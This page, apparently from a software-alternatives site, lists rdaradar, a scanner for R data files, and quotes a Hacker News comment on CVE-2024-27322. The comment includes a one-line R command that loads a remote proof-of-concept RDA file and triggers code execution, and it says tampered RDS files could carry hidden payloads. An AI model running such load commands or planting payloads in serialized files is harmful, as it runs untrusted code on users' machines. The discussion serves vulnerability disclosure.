rdaradar

☢️ Safety Radar for RDA Files (by hrbrmstr)

rdaradar reviews and mentions

Posts with mentions or reviews of rdaradar. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2024-05-13.
  • Statement on CVE-2024-27322
    2 projects | news.ycombinator.com | 13 May 2024
    > We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.

    Isn't this demonstrably false? I.e. run this [1]

    load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

    and it opens the calculator application on Windows/macOS (or echoes 'pwnd' on Linux).

    To me, if someone can easily cause their code to run on my computer, that's a pretty serious vulnerability. read.csv() or fromJSON() do not allow this.

    I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.

    FWIW, my recommendation is that CRAN should create a function like readRDS() that only ever reads in data and does not allow any extra code to be run, then only allow that on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.

    [1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...

Stats

Basic rdaradar repo stats
1
45
4.7
29 days ago

hrbrmstr/rdaradar is an open source project licensed under the MIT License, which is an OSI-approved license.

The primary programming language of rdaradar is R.
